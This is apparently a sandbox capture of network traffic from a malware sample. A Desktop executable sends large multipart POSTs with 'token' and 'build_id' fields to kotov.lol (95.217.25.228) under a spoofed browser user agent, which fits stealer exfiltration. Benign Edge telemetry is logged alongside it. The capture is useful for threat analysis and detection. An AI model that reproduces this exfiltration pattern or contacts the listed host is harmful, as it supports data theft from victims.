2024-11-29 11:28:06 UTC	16053	IN	Data Raw: 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 64 65 39 35 62 34 33 62 63 65 65 62 34 62 39 39 38 61 65 64 34 61 65 64 35 63 65 66 31 61 65 37 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 33 33 31 39 35 35 36 37 30 31 31 37 37 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 61 64 64 65 63 34 32 36 39 33 32 65 37 31 33 32 33 37 30 30 61 66 61 31 39 31 31 66 38 66 31 63 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 30 2e 31 36 30 39 38 34 33 32 38 39 38 35 39 32 34 0d Data Ascii: }, { "key": "de95b43bceeb4b998aed4aed5cef1ae7", "value": -1.03319556701177 }, { "key": "addec426932e71323700afa1911f8f1c", "value": 0.160984328985924

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.8	49797	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:05 UTC	319	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKJDBFBKKJEBFHJEHJD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 393697 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:05 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 44 42 46 42 4b 4b 4a 45 42 46 48 4a 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 44 42 46 42 4b 4b 4a 45 42 46 48 4a 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 44 42 46 42 4b 4b 4a 45 42 46 48 4a 45 48 4a 44 0d 0a 43 6f 6e 74 Data Ascii: ------BKKJDBFBKKJEBFHJEHJDContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------BKKJDBFBKKJEBFHJEHJDContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------BKKJDBFBKKJEBFHJEHJDCont
2024-11-29 11:28:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Nov 2024 11:28:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.8	49778	18.165.220.66	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:07 UTC	925	OUT	GET /b?rn=1732879686233&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0D52E8701DB86AF23F08FD361CDF6BCA&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:07 UTC	955	IN	HTTP/1.1 302 Found Content-Length: 0 Connection: close Date: Fri, 29 Nov 2024 11:28:07 GMT Accept-CH: UA, Platform, Arch, Model, Mobile Location: /b2?rn=1732879686233&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0D52E8701DB86AF23F08FD361CDF6BCA&cs_fpit=o&cs_fpdm=null&cs_fpdt=null set-cookie: UID=1D1a855ad4f7b332cc35e551732879687; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000 set-cookie: XID=1D1a855ad4f7b332cc35e551732879687; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000 X-Cache: Miss from cloudfront Via: 1.1 197697b195c6b318459fc725f7d28906.cloudfront.net (CloudFront) X-Amz-Cf-Pop: BAH53-P1 X-Amz-Cf-Id: eQwwyyKDBDUA2ttb9ma9NusDgRNR9fD7xzieCPoroc2C6DAtHqrEeQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.8	49802	95.217.25.228	443	7516	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:07 UTC	319	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kotov.lol Content-Length: 131557 Connection: Keep-Alive Cache-Control: no-cache
2024-11-29 11:28:07 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 64 62 33 66 33 32 32 37 30 65 32 39 61 38 65 65 65 30 64 35 32 64 33 36 36 61 33 32 39 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 61 33 63 38 64 38 35 31 39 65 31 38 31 66 66 32 62 36 37 66 35 30 65 38 66 39 39 30 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 Data Ascii: ------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="token"edb3f32270e29a8eee0d52d366a329a6------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="build_id"b60a3c8d8519e181ff2b67f50e8f990c------KFHJJJKKFHIDAAKFBFBFCont
2024-11-29 11:28:07 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:07 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:07 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-29 11:28:07 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
